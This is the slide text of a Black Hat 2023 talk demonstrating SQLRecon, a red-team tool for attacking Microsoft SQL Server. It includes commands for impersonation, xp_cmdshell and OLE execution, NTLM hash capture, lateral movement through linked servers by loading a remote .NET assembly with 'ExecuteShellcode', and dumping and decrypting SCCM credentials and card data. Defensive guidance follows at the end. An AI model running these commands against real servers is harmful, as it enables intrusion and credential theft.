Video: https://youtu.be/LsYSePobFWA
Conference: Black Hat USA Arsenal 2023
Presentation Title: Abusing Microsoft SQL Server with SQLRecon
Presenter: Sanjiv Kawa
2. #BHUSA @BlackHatEvents
Information Classification: General
Senior Managing Security Consultant, Adversary Services at IBM X-Force Red
- Red Team Operator / Adversary Simulation
- Post-Exploitation Tool Developer
- github.com/xforcered/SQLRecon
Sanjiv Kawa
@sanjivkawa
github.com/skahwah
Intro
IBM X-Force Red
3. #BHUSA @BlackHatEvents
Information Classification: General
Agenda
Microsoft SQL Server Overview 2 min
SQLRecon Overview 4 min
10 Demos! 20 min
- Enumeration
- Standard Modules
- Attacking MS SQL Server with Low Privileges
- Abusing MS SQL Impersonation
- Attacking Linked MS SQL Servers
- Attacking MS MECM / SCCM Databases
Defensive Considerations 3 min
Questions 5 min
4. #BHUSA @BlackHatEvents
Information Classification: General
Get Involved!
Hack with me
Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases
Spin up a Windows VM
Connect to SSID SQLRecon-Lab, don’t worry, it’s safe
Connection details will be provided before demo’s
6. #BHUSA @BlackHatEvents
Information Classification: General
MS SQL Server Overview
Relational database which allows the storage and retrieval of data
Deployed on-premise on top of Microsoft Server or in the cloud
Used by businesses of all sizes, not just large enterprise networks
Tightly integrated into Active Directory / Azure Active Directory
7. #BHUSA @BlackHatEvents
Information Classification: General
Why Attack MS SQL Server?
Often overlooked
Often misconfigured
BUILTINUsers can connect to MS SQL Server by default, and:
- Execute basic SQL commands
- Determine privileges via user mapping/roles
- UNC Path injection
- Piggyback off rights to compromise linked SQL servers
11. #BHUSA @BlackHatEvents
Information Classification: General
How did this research come about?
Like most tooling … to solve a problem encountered on an engagement
PowerShell is good, but C# is better when evading modern defensive controls
Address the MS SQL Server C# post-exploitation tooling gap
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational Security
- Execution Guardrails
- SQLRecon works with a diverse set of C2 frameworks
- Fork & Run and In-Process compatible
13. #BHUSA @BlackHatEvents
Information Classification: General
New Features for Black Hat
SQLRecon v2.2.2
- Windows Token
- Local Database
- AzureAD
3 Authentication Providers
SQLRecon v3.3
+ Windows Domain
+ Azure Local Database
5 Authentication Providers
14. #BHUSA @BlackHatEvents
Information Classification: General
New Features for Black Hat
SQLRecon v2.2.2
- Enumerate and Query MS SQL databases
- Execute arbitrary operating system commands
- Abuse impersonation
- Attack linked MS SQL servers
57 Modules
15. #BHUSA @BlackHatEvents
Information Classification: General
New Features for Black Hat
SQLRecon v2.2.2
- Enumerate and Query MS SQL databases
- Execute arbitrary operating system commands
- Abuse impersonation
- Attack linked MS SQL servers
57 Modules
SQLRecon v3.3
+ Ground up rewrite using MS C#/.NET code guide
+ Many new enumeration and execution modules
+ Support for attacking MECM / SCCM Databases
+ Better OPSEC and execution guardrails
+ Brand new wiki
+ And more!
83 Modules
17. #BHUSA @BlackHatEvents
Information Classification: General
Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:
- An authentication type
SQLRecon.exe /Auth:WinToken
18. #BHUSA @BlackHatEvents
Information Classification: General
Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address for a MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01
19. #BHUSA @BlackHatEvents
Information Classification: General
Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address for a MS SQL Server
- A module
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
20. #BHUSA @BlackHatEvents
Information Classification: General
Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address for a MS SQL Server
- A module
Example: Enumerating databases on a remote MS SQL Server.
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
21. #BHUSA @BlackHatEvents
Information Classification: General
Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address for a MS SQL Server
- A module
Example: Enumerating databases on a remote MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
Shortform command line arguments and case-insensitive
SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
23. #BHUSA @BlackHatEvents
Information Classification: General
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module
24. #BHUSA @BlackHatEvents
Information Classification: General
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
25. #BHUSA @BlackHatEvents
Information Classification: General
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
26. #BHUSA @BlackHatEvents
Information Classification: General
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
27. #BHUSA @BlackHatEvents
Information Classification: General
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
28. #BHUSA @BlackHatEvents
Information Classification: General
Module Overview
SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios
Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution:
Module
Privilege
Escalation
Lateral
Movement
Command
Execution
xp_cmdshell ✅ ✅ ✅
OLE Automation Procedures ✅ ✅ ✅
CLR Integration for Custom .NET Assemblies ✅ ✅ ✅
Agent Jobs ✅ ✅ ✅
Cleartext ADSI Credential Retrieval ✅
MECM / SCCM User Management ✅
Cleartext MECM / SCCM Credential Retrieval ✅
30. #BHUSA @BlackHatEvents
Information Classification: General
Get Involved!
Rules
Don’t DoS the lab. We’re all here to learn together.
Don’t attack each other. We’re all here to learn together.
You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
31. #BHUSA @BlackHatEvents
Information Classification: General
Get Involved!
WiFi
SSID: SQLRecon-Lab
Password: SQLReconBH2023!
Lab
DC01 172.16.10.100
SQL01 172.16.10.101
SQL02 172.16.10.102
SQL03 172.16.10.104
MECM01 172.16.10.103
ecom01.database.windows.net
Test Connection String
SQLRecon.exe /a:WinDomain
/d:kawalabs /u:jsmith
/p:Password123 /h:172.16.10.101
/m:whoami
Rules
Don’t DoS the lab. We’re all here to learn together.
Don’t attack each other. We’re all here to learn together.
You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
34. #BHUSA @BlackHatEvents
Information Classification: General
Demo 1
Recap
- Used the whoami command to determine the permissions for the current user
- Determined that KAWALABSJSmith is a Domain User in the KAWALABS.LOCAL domain.
37. #BHUSA @BlackHatEvents
Information Classification: General
Demo 2
Recap
- Used SQLRecon to connect to AD in context of KAWLABSJSmith and locate MS SQL Servers via registered SPNs
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and gather MS SQL Server information
SQLRecon.exe /e:SQLSpns /d:kawalabs.local
SQLRecon.exe /a:WinToken /h:SQL02 /m:info
40. #BHUSA @BlackHatEvents
Information Classification: General
Demo 3
Recap
- Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list permissions
- Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list databases
- Performed an ad-hoc SQL query to obtain the contents of the cc table in the Payments database
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123
/h:ecom01.database.windows.net /m:whoami
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123
/h:ecom01.databases.windows.net /m:databases
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123
/h:ecom01.databases.windows.net /database:Payments /m:query /c:”select * from cc”
43. #BHUSA @BlackHatEvents
Information Classification: General
Demo 4
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and initiate an SMB request to receive a NetNTLMv2 hash
SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:172.16.10.19Projects
46. #BHUSA @BlackHatEvents
Information Classification: General
Demo 5
Recap
- Used SQLRecon to connect to SQL01 in context of KAWLABSJSmith and attempted to execute commands via xp_cmdshell
- Attempted to enable xp_cmdshell on SQL01 in context of KAWLABSJSmith
- As expected, KAWLABSJSmith encounters an execution guardrail on SQL01 due to insufficient privileges
SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe
SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXP
50. #BHUSA @BlackHatEvents
Information Classification: General
Demo 6
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate accounts that can be impersonated
- Enabled OLE Automation Procedures on SQL02 via impersonation
- Executed an arbitrary command using OLE Automation Procedures on SQL02 by abusing impersonation
SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:”powershell.exe ls
172.16.10.19Projects”
51. #BHUSA @BlackHatEvents
Information Classification: General
Demo 6
Recap
- Enabled xp_cmdshell on SQL02 via impersonation
- Executed an arbitrary command using xp_cmdshell on SQL02 by abusing impersonation
- Practiced good OPSEC by reverting OLE Automation Procedures and xp_cmdshell on SQL02 to the original state
SQLRecon.exe /a:WinToken /h:SQL02 /m:iEnableXp
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp
54. #BHUSA @BlackHatEvents
Information Classification: General
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
- CLR Integration allows custom .NET assemblies to be imported into MS SQL Server
- Assemblies get stored inside a SQL database Stored Procedure
- You can then execute whatever is inside the custom assembly!
55. #BHUSA @BlackHatEvents
Information Classification: General
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
// sql.cs
// C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void CustomFunctionName()
{
Process proc = new Process();
proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe";
proc.Start();
}
}
57. #BHUSA @BlackHatEvents
Information Classification: General
Demo 7
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate linked MS SQL Server
- Listed permissions on SQL03 after riding the MS SQL Server link via SQL02
- Enabled CLR Integration on SQL03 via SQL02
- Downloaded a custom .NET CLR assembly via HTTPS and executed it on SQL03 via SQL02 in order to laterally move
SQLRecon.exe /a:WinToken /h:SQL02 /m:links
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png
/function:ExecuteShellcode
61. #BHUSA @BlackHatEvents
Information Classification: General
Demo 8
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate links on SQL03
- Started a local LDAP server on SQL03 via SQL02 an obtained the cleartext credential for the account used to link SQL03 to DC01
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103
64. #BHUSA @BlackHatEvents
Information Classification: General
Demo 9
Recap
- Used SQLRecon to connect to the database of MECM01 and list databases
- Enumerated users who are authorized to authenticate against SCCM
- Listed tasks configured in SCCM
SQLRecon.exe /a:WinToken /h:MECM01 /m:databases
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList
67. #BHUSA @BlackHatEvents
Information Classification: General
Demo 10
Recap
- Used SQLRecon to connect to the database of MECM01 and list vaulted credentials
- Decrypted SCCM vaulted credentials (shout out to Adam Chester @_xpn_)
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials
69. #BHUSA @BlackHatEvents
Information Classification: General
Defensive Considerations
Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance!
github.com/xforcered/SQLRecon/wiki
70. #BHUSA @BlackHatEvents
Information Classification: General
Defensive Considerations
Top 3 Network Security Controls
- Account for network routes to MS SQL Server
- Limit routes to only authorized set of systems/subnets
- Ensure you are receiving telemetry via network logging and monitoring tools
github.com/xforcered/SQLRecon/wiki
71. #BHUSA @BlackHatEvents
Information Classification: General
Defensive Considerations
Top 3 Endpoint Security Controls
- Regularly control tune your EDR solutions
- Evaluate if your host-based security controls (EDR / AV) supports scanning of .NET assemblies in memory
- Application allow listing
github.com/xforcered/SQLRecon/wiki
72. #BHUSA @BlackHatEvents
Information Classification: General
Defensive Considerations
Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server security best practices
- Consider removing or restricting the BUILTINUsers
account and low privilege groups from authenticating
against MS SQL Server instances
- Evaluate impersonation and MS SQL Server links
github.com/xforcered/SQLRecon/wiki